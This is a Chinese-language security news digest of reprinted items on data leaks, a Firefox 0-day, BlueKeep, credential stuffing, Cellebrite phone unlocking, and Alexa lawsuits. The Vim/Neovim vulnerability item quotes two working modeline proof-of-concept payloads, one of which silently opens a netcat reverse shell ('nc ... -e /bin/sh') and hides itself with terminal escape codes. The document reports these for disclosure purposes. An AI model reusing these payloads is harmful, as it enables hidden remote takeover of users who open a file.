内容转载

= ̄ω ̄= 内容转载

佛罗里达州一家广告公司泄露了美国退伍军人战争伤害的数据

据外媒ZDNet报道,一家总部位于佛罗里达州的广告代理商的一个数据库在网上被泄露。该数据库包括了过去广告活动的详细信息,包括有关医疗事故案件的信息,以及美国退伍军人战争伤害的敏感细节。 该数据库由vpnMentor的安全研究人员发现,属于X Social Media,这是一家为法律行业开展Facebook和Instagram广告活动的广告公司。该公司的主要兴趣和重点之一是针对医疗事故诉讼和与伤害相关的集体诉讼进行广告宣传。 这些广告活动的目的是收集可能的各方兴趣,用户被重定向到专门的网站,在那里他们填写表格,看看他们是否有资格获得特定案件和可能的法律援助。 vpnMentor研究人员指出,X Social Media收集此信息的数据库在没有密码的情况下在互联网上公开,允许任何人访问和下载其内容。 研究人员表示,该数据库包含了填写表格的用户的150,000多条回复。这些表格中包含的数据通常包括全名、电子邮件地址、家庭住址、电话号码以及与其案件相关的详细信息 – 主要针对医疗损伤。 vpnMentor在本周发表的一份报告中指出: “数据库中描述的伤害包括美国退伍军人遭受的伤害,医疗设备,药物使用,药物副作用和婴儿产品缺陷造成的伤害。”有关战争伤害的详细信息不仅包括伤害发生的日期和地点等信息,还包括该人在此后遭受的详细医疗信息和精神创伤等。 除了有关各种伤害和法律案件的高度敏感信息之外,X Social Media的数据库还包含有关公司所有客户,广告活动指标,甚至公司所有发票的信息。 如果黑客找到了数据库并窃取了其内容,那么该数据将成为该公司竞争对手手中的“一张王牌”,他们可能会利用它来破坏X Social Media的业务,或者仅仅破坏其声誉。 vpnMentor研究人员说道:“未来律师事务所可能不太愿意与经历过这种大规模数据泄露事件的公司合作。” 目前尚不清楚是否有任何未经授权的人访问或下载这些数据,因为X Social Media没有回复评论请求,也没有向vpnMentor透露此详细信息。 在vpnMentor研究人员通知该公司后,这家广告代理商于6月11日关闭了对其数据库的访问权限。   (稿源:cnBeta,封面源自网络。)

Firefox 曝出严重安全漏洞,建议所有用户尽快更新

Mozilla 发布了 Firefox 67.0.3 和 Firefox ESR 60.7.1 版本,用于紧急修复最新发现的 0day 漏洞。 安全公告中的完整描述如下: 由于 Array.pop 中的问题,操作 JavaScript 对象时可能会出现类型混淆漏洞。这可能导致可利用的崩溃。我们意识到已经有针对性的攻击滥用这个漏洞。 也就是说,该漏洞能够让黑客操纵 JavaScript 代码诱骗用户访问,并将恶意代码部署到他们的 PC 上。 该漏洞由 Google Project Zero 安全研究团队的 Samuel Groß 发现并报告,编号 CVE-2019-11707,安全等级为“严重”。甚至美国网络安全和基础设施安全局也已经参与传播有关补丁的信息。 有报道称可能有黑客利用这个漏洞进行攻击,获取加密货币。但除了 Mozilla 网站上发布的简短描述之外,没有关于此安全漏洞或持续攻击的其他详细信息。 以注重安全和隐私著称的 Firefox 出现 0day 漏洞是非常罕见的,Mozilla 团队最后一次修补 Firefox 0day 还是在 2016 年 12 月。 目前, Mozilla 安全委员会提醒所有 Firefox 用户尽快升级到最新版本,以避免遭受攻击。   (稿源:开源中国,封面源自网络。)

CBP 分包商出现重大数据泄露事件 至少 5 万名美国车牌信息在暗网出售

援引美国有线电视新闻网(CNN)报道,美国海关和边境保护局(CBP)所雇佣的分包商Perceptics出现重大数据泄露事件,在对已经泄露的数据分析后发现至少有5万名美国车牌号码数据在暗网上被销售。更为重要的是,CBP向CNN透露从未向该公司授权保留这些车主信息。 CBP机构发言人表示:“CBP并未授权承包商在非CBP系统上保留和持有车牌数据。”这项承认引发了一系列质疑,包括美国政府机构在雇佣承包商来监视公民的时候责任主体是谁?美国公民自由联盟的高级立法律师Neema Singh Guliani表示:“CBP不断以隐私和公民自由的角度来收集更多信息,而且从安全的角度来看,他们已经证明了这些承包商没有能力可以保护好这些信息。” CNN对分包商Perceptics泄露的数据进行了分析,这些数据目前已经在暗网上进行出售。它显示了至少5万个独特的美国车牌号码记录。在特定情况下,CBP承包商有权访问美国人的车牌图像以调整他们的系统,例如当州颁布新的车牌设计并且系统需要校准它时。但这些时期很短暂。 “这些数据确实必须删除,”CBP发言人表示,尽管该机构没有澄清适用于Perceptics的政策细节。   (稿源:cnBeta,封面源自网络。)

CISA 再发安全警告:推荐 Windows 用户尽快修复 BlueKeep 漏洞

微软一直说服Windows老用户尽快安装补丁,以修复名为“BlueKeep”的严重RDP漏洞。在本月早些时候得到美国国家安全局(NSA)的支持之后,微软再次得到了美国网络安全和基础设施安全局(CISA)的帮助,后者发布了一个“Activity Alert”,提醒和警告用户尽快安装BlueKeep漏洞补丁。 在Alert警告中写道:“CISA鼓励用户和系统管理员审查微软的安全公告,以及关于CVE-2019-0708的微软客户指南,并尽快采取适当的缓解措施。”尽管在CISA的官方警告中并没有明确说明,但援引外媒Engadget报道称CISA正在测试一项“工具”来验证BlueKeep漏洞是否已经被修复。 该漏洞被描述为蠕虫式(wormable),可以利用RDS服务传播恶意程序,方式类似于2017年肆虐的WannaCry勒索软件。目前已经有匿名黑客尝试利用该漏洞执行任意代码,并通过远程桌面协议(RDP)来发送特制请求,在不需要用户交互的情况下即可控制计算机。 目前微软已经发布了适用于Windows 7、Windows Server 2008、Windows XP、Windows Server 2003的补丁。Windows 7和Windows Server 2008用户可以通过启用Network Level Authentication (NLA)来防止未经身份验证的攻击,并且还可以通过阻止TCP端口3389来缓解威胁。 借助 Masscan Internet 等工具,Errata Security 的 Graham 对公网上的 3389 规模进行了大范围扫描,发现漏洞影响将近百万台设备,而黑客有可能在未来一两个月造成严重的破坏。 据悉,受影响的机器包括西门子的一些医疗设备,比如面向放射肿瘤科、实验室诊断、射线成像、医疗点诊断等应用的产品。 为此,西门子建议尽快为潜在受影响的设备打上补丁,并在必要时直接禁用 3389 端口的远程桌面连接(RDP)功能。   (稿源:cnBeta,封面源自网络。)

盘点过去 15 年影响最恶劣的 15 起用户隐私泄露事件

近年来用户隐私泄露事件频发,可以用触目惊心来形容。网站托管比较网站HostingTribunal整理了一个信息图,盘点过去15年中影响最恶劣的15安全事件。自2013年以来,由于数据泄露超过14,717,618,286条记录丢失或被盗,仅2018年上半年就有3,353,178,708条记录遭到窃取。在2017年全球86%的泄露事件发生在北美,2018年美国45.9%的数据泄露事件发生在商业领域。 其中泄露事件之一就是2015年1月,一家自称为“Peace”的俄罗斯黑客组织窃取了1.17亿个LinkedIn电子邮件和密码凭证。2014年至2018年期间,网络犯罪分子收集了万豪国际连锁酒店超过5亿客人的个人数据,并于2018年9月成功攻击Facebook,窃取了5000万用户账户。 关于过去15年影响最恶劣的15起安全事件细节,可以查看以下的信息图:   (稿源:cnBeta,封面源自网络。)

Akamai 表示黑客在 17 个月内对全球游戏网站进行了 120 亿次攻击

根据互联网交付和云服务公司Akamai的最新报告,黑客在截至2019年3月的17个月内对全球游戏网站进行了120亿次凭证填充攻击,从而瞄准了游戏行业。这使得游戏社区成为凭证填充攻击中增长最快的目标。在这些攻击当中,黑客利用窃取的凭据来接管帐户,并且寻求快速获利。在同一时间段内,Akamai在所有行业中,共遭遇550亿次凭据填充攻击。 报告还显示,SQL注入(SQLI)攻击现在占所有Web应用程序攻击的65.1%,本地文件包含(LFI)攻击占24.7%。报告的数据显示,作为一种攻击手段,SQLI攻击继续以惊人的速度增长,2018年假日购物季期间这种攻击活动量激增。在2017年第一季度,SQLI攻击占所有应用层攻击的44%。 事实上,今年早些时候,Akamai研究人员发现了一个攻击视频教学,其中黑客展示了如何对易受攻击的网站进行SQLI攻击,然后使用获得的凭据生成可用于对流行在线游戏进行凭据填充攻击的列表。 Akamai研究人员认为游戏行业对黑客有吸引力的一个原因是,犯罪分子可以轻松地将游戏内的物品交换为利润。此外,游戏玩家是一个以花钱出名的小众群体,因此他们的财务状况也是一个诱人的目标。黑客似乎更重视与有效信用卡或其他财务资源相关联的受感染帐户。一旦这些帐户遭到入侵,犯罪分子就可以购买额外的物品,例如游戏中使用的货币,然后以加价方式交易或出售。 虽然游戏公司不断创新和改进防御,但这些公司也必须继续帮助教育他们的消费者如何保护自己。许多游戏玩家都很年轻,如果他们被教导保护自己帐户的最佳方法,那么他们将把这些最佳实践融入他们的余生当中。     (稿源:cnBeta,封面源自网络。)

以色列公司 Cellebrite 宣称可解锁所有 iOS 12 设备

破解工具UFED的宣传画面 6月17日上午消息,以色列的法证公司Cellebrite本周透露,它现在有能力解锁任何运行iOS 12.3的iOS设备。该公司在推特上宣布了这一消息,并大力宣传其用于法律提取证据的作用。 在他们产品UFED Premium(通用取证提取装置)的介绍网页上,Cellebrite称这是执法机构“解锁并从所有iOS和旗舰安卓设备中提取关键手机证据”的唯一解决方案。 在iOS系统上,UFED Premium支持运行iOS 7到iOS 12.3的所有设备。他们可以绕过屏幕锁,在任何iOS设备上完整提取文件系统,从而获得比其他传统方法更多的数据。 他们介绍说:通过此工具,能获取第三方应用程序数据、聊天对话、已经下载到手机的电子邮件和附件、甚至已经删除的内容等等,增加你找到犯罪证据并解决案件的机会。 虽然UFED只作为内部工具出售给警方。但这产品毕竟是第三方民间公司研发的产品,而且是商业售卖流程,这种方法让Cellebrite很难保护自己的技术。今年,Cellebrite的产品在eBay上就随处可见,价格仅为100美元。 苹果公司一直在努力阻止Cellebrite和Grayshift等公司的破解工具。去年10月,有消息称,由于苹果系统的改进,Grayshift的GrayKey取证盒无法解锁iOS 12设备。但目前,这场攻防战中破解那方似乎又扳回一局。 对一般用户来说,恐怕不会有人费尽心思去破解你的手机,但这种产品的存在会让人又一种隐忧,毕竟它是存在的,而且获取成本并不算高。   (稿源:新浪科技,封面源自网络。)

美军网络司令部已在俄罗斯电网植入恶意软件 必要时可使其瘫痪

最新披露的报告显示,美军的网络司令部(Cyber Command)在过去一年中对俄罗斯的攻击规模要比以往任何时候都更加激进,并且在控制俄罗斯电网的多个系统中植入了“可以使其瘫痪的恶意软件”。 俄罗斯的电网 纽约时报本周六的报道中,援引匿名官员的话说这主要是由于自去年夏天开始美国国会放宽了相关的法律授权限制,网络司令部的战略从防御态势转变为进攻性态势,从而允许在发生冲突的时候在网络攻击中造成严重的瘫痪攻击。 纽约时报表示网络司令部的行动由美国国防部长确认,并没有经过美国现任总统特朗普的授权。最近一些针对俄罗斯的攻击行动是美国国会于2018年通过的一项军事授权法案下进行的,该法案允许在网络空间中“秘密进行军事活动”以威慑,保护或防御针对美国的攻击或恶意网络攻击。 纽约时报还表示,网络司令部去年在13号国家安全总统备忘录中获得了美国总统赋予的新权力,允许对俄罗斯小型黑客团体发起攻击,并支持“打压”Internet Research Agency(被认为干预2016年美国总统大选,充斥各种假新闻和钓鱼活动的俄罗斯黑客机构)。   (稿源:cnBeta,封面源自网络。)

Vim 与 Neovim 曝出任意代码执行漏洞

安全研究人员发现 Vim 与 Neovim 中存在一个任意执行漏洞,允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的所有版本。 该漏洞存在于编辑器的 modeline(模式行)功能,此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项,它在一个被操作系统封锁的沙箱中运行,并且可用命令也被限制,但是研究人员 Arminius 发现了绕过该安全保护的方法。 目前漏洞已经被编号为 CVE-2019-12735,Arminius 也释出了两个概念验证。 第一个是直接利用该漏洞使系统执行`uname -a`命令: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" 另一个利用方式更加深入,一旦用户打开文件就自动启动反向 shell。为了隐藏攻击,文件将在打开时立即重写。此外,当使用 cat 输出内容时,攻击还使用终端转义序列隐藏 modeline: \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n 目前补丁也已经释出: Vim patch 8.1.1365 Neovim patch (released in v0.3.6) 更具体的细节见: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md.   (稿源:开源中国,封面源自网络。)

因 Alexa 经常收集儿童用户录音 亚马逊遭到起诉

据报道外媒,任何打开 YouTube 的人都能找到无数儿童在与 Alexa 开心交谈的视频。Alexa 是亚马逊推出的一款数字语音助手智能扬声器产品。在这款产品给用户带来便利、乐趣的同时,许多人却在担心由其带来的隐私问题。 日前,这家公司就因这个问题遇到了两起联邦诉讼。诉讼称 Alexa 经常在未经儿童或其父母同意的情况下对数百万名儿童进行录音和收集声纹。 获悉,其中一起诉讼于周二在西雅图联邦法院发起,原告为一名来自马萨诸塞州的 10 岁女孩。就在同一天,洛杉矶法院也接到了一起类似的诉讼,原告则为一名 8 岁的男孩。 诉讼的核心在于加利福尼亚州和华盛顿都被称为“两方同意州”。在这两个州中,如果想要对某人进行录音商家则必须要征得双方的同意才行。然而,西雅图的诉讼称,“亚马逊从未警告未注册用户,它正在为他们的 Alexa 互动创建持续的语音记录,更不用说征得他们的同意了。” 针对这两起诉讼案,亚马逊方面拒绝置评。   (稿源:cnBeta,封面源自网络。)